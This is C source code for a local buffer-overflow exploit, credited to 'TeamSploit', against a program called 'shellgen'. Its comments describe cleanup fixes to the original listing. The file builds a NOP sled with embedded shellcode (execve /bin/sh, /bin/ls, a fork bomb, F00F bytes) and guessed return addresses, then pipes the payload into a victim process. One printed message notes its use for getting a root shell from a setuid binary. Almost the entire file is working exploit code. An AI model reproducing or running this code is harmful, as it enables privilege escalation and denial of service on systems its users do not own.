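/*
 *
 * This is a TeamSploit production
 * exploit for shellgen.c ( please read the advisory attached )
 * ./shellgen_exp <shellcode#> <command> [offset]
 * TeamSploit labs : http://el8.n3.net
 *
 * Payload layout: a NOP sled with the shellcode flush against its end in the
 * first THE_BUFFER_IS bytes, then LEEWAY bytes of repeated 4-byte return
 * addresses, then a terminating NUL.  The shellcodes use int 0x80 and the
 * return address is 4 bytes wide, so the payload is only meaningful against
 * an i386 target; the tool itself builds on other hosts.
 *
 * Security note: argv[2] is handed verbatim to popen(), i.e. to /bin/sh -c.
 * The operator naming the victim command is the intended use of this tool,
 * but it must never be driven with arguments chosen by someone else.
 *
 * Review fixes relative to the original listing:
 *  - strlen() was used on the f00f/forkbomb byte arrays, which carry no NUL
 *    terminator (out-of-bounds read); lengths now come from sizeof.
 *  - the NUL terminator was written at tuff[THE_BUFFER_IS + LEEWAY], one
 *    byte past the end of the array; the buffer is one byte larger now.
 *  - the "generic" payload filled the whole buffer without a terminator and
 *    was then printed with "%s" (out-of-bounds read).
 *  - return addresses were stored through an unsigned long cast (8 bytes on
 *    64-bit hosts, overflowing the buffer); they are now 4 bytes, as the
 *    i386 payload requires.
 *  - get_sp() had no return statement; printf() used %x for an unsigned
 *    long; popen() failure exited with status 0.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define THE_OFFSET_IS 256   /* default delta added to our %esp to guess the victim's */
#define THE_BUFFER_IS 1024  /* bytes of NOP sled + shellcode */
#define LEEWAY 8            /* bytes of return-address copies after the buffer */

/*
 * Raw byte payloads.  The first three have NO NUL terminator, so their
 * length must always be taken with sizeof, never strlen.
 */
unsigned char f00f_shellcode[] = { 0xF0, 0x0F };                             /* the two bytes the F00F bug is named after */
unsigned char forkbomb_shellcode[] = { 0xb0, 0x02, 0xcd, 0x80, 0xeb, 0xfa }; /* mov al,2 ; int 0x80 ; jmp -6 (fork forever) */
unsigned char generic_shellcode[] = { 0x41 };                                /* fill byte only, see case 3 in main() */

/*
 * execve("/bin/sh") and execve("/bin/ls") payloads.  They contain no NUL
 * bytes, so sizeof - 1 (used below) and strlen agree on their length.
 */
unsigned char sh_shellcode[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

unsigned char ls_shellcode[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/ls";

/*
 * Best-effort read of the current stack pointer, used as the base for the
 * return-address guess.  The original relied on whatever a bare asm statement
 * left in %eax and had no return statement, which is undefined behaviour.
 */
unsigned long get_sp(void)
{
    unsigned long sp;
#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
#elif defined(__x86_64__)
    __asm__ volatile ("movq %%rsp, %0" : "=r" (sp));
#else
    volatile char probe = 0;
    sp = (unsigned long) &probe; /* address of a local: close to the real SP */
#endif
    return sp;
}

/*
 * Print the argument summary and bail out.  31337 is a TeamSploit in-joke:
 * only the low 8 bits (105) survive as the process exit status.
 */
void usage(void)
{
    puts("./shellgen (optional)");
    puts("1 = f00f");
    puts("2 = forkbomb");
    puts("3 = generic");
    puts("4 = shell");
    puts("5 = ls");
    exit(31337);
}

/*
 * Lay out one payload in buf, which must hold THE_BUFFER_IS + LEEWAY + 1
 * bytes: a 0x90 sled, the shellcode ending exactly at byte THE_BUFFER_IS,
 * LEEWAY bytes of 4-byte copies of ret in host byte order (as the original
 * pointer store did on i386), and a terminating NUL.
 *
 * Returns 0 on success, -1 if sc_len does not fit in THE_BUFFER_IS.
 */
static int build_payload(char *buf, const unsigned char *sc, size_t sc_len,
                         uint32_t ret)
{
    size_t i;

    if (sc_len > THE_BUFFER_IS)
        return -1;

    memset(buf, 0x90, THE_BUFFER_IS - sc_len);
    memcpy(buf + THE_BUFFER_IS - sc_len, sc, sc_len);

    /* memcpy rather than a pointer cast: no alignment or aliasing issues,
     * and always exactly 4 bytes regardless of sizeof(unsigned long). */
    for (i = THE_BUFFER_IS; i + sizeof ret <= THE_BUFFER_IS + LEEWAY; i += sizeof ret)
        memcpy(buf + i, &ret, sizeof ret);

    buf[THE_BUFFER_IS + LEEWAY] = '\0';
    return 0;
}

/*
 * argv[1]: payload number (1-5), argv[2]: command to feed the payload to via
 * popen(), argv[3] (optional): decimal offset added to our stack pointer to
 * form the return address (default THE_OFFSET_IS; negative values wrap, as
 * the original unsigned arithmetic did).
 */
int main(int argc, char *argv[])
{
    FILE *m1xt3r;
    char *prognam, *end;
    char tuff[THE_BUFFER_IS + LEEWAY + 1]; /* +1: room for the terminating NUL */
    unsigned long sp;
    long choice, offset;
    uint32_t ret;
    int rc;

    if (argc < 3)
        usage();

    /* strtol instead of atoi so "abc" is rejected rather than read as 0 */
    choice = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0')
        usage();

    switch (choice) {
    case 1:
        puts("F00F SHELLCODE CHOSEN");
        break;
    case 2:
        puts("FORKBOMB SHELLCODE CHOSEN (PREMIUM CHOICE)");
        break;
    case 3:
        puts("GENERIC SHELLCODE (provided by gH thnx)");
        break;
    case 4:
        puts("RUN A SHELL (good for when shellgen is +s root)");
        break;
    case 5:
        puts("LS SHELLCODE (INCASE LS IS BACKDOORED)");
        break;
    default:
        usage();
    }

    prognam = argv[2];

    offset = THE_OFFSET_IS;
    if (argc >= 4) {
        offset = strtol(argv[3], &end, 10);
        if (end == argv[3] || *end != '\0')
            usage();
    }

    /* One read of the stack pointer, truncated to the 4-byte width the
     * i386 payload needs; the low 32 bits match the original on i386. */
    sp = get_sp();
    ret = (uint32_t) (sp + (unsigned long) offset);
    printf("ADDRESS = 0x%lx, OFFSET = 0x%lx\n", sp, (unsigned long) ret);

    /* Build the payload before spawning the victim so a layout failure does
     * not leave a half-started child behind. */
    switch (choice) {
    case 1:
        rc = build_payload(tuff, f00f_shellcode, sizeof f00f_shellcode, ret);
        break;
    case 2:
        rc = build_payload(tuff, forkbomb_shellcode, sizeof forkbomb_shellcode, ret);
        break;
    case 3:
        /* No sled and no return addresses: the whole buffer is the fill byte. */
        memset(tuff, generic_shellcode[0], THE_BUFFER_IS + LEEWAY);
        tuff[THE_BUFFER_IS + LEEWAY] = '\0';
        rc = 0;
        break;
    case 4:
        rc = build_payload(tuff, sh_shellcode, sizeof sh_shellcode - 1, ret);
        break;
    case 5:
        rc = build_payload(tuff, ls_shellcode, sizeof ls_shellcode - 1, ret);
        break;
    default:
        rc = -1; /* unreachable: choice was validated above */
        break;
    }
    if (rc < 0) {
        fputs("shellcode does not fit in the buffer\n", stderr);
        exit(EXIT_FAILURE);
    }

    /* argv[2] is run through the shell; see the security note at the top. */
    if ((m1xt3r = popen(prognam, "w")) == NULL) {
        perror("p o p e n");
        exit(EXIT_FAILURE); /* the original exit(0) reported success here */
    }

    puts("Get ready, we are about to exploit shellgen, hold on tight");

    /* Delivered as a C string, exactly like the original fprintf "%s": a NUL
     * byte inside the return address would cut the payload short. */
    fputs(tuff, m1xt3r);

    if (pclose(m1xt3r) < 0) {
        perror("pclose");
        exit(-1);
    }
    return 0;
}
/* www.hack.co.za [23 Feb 2000]*/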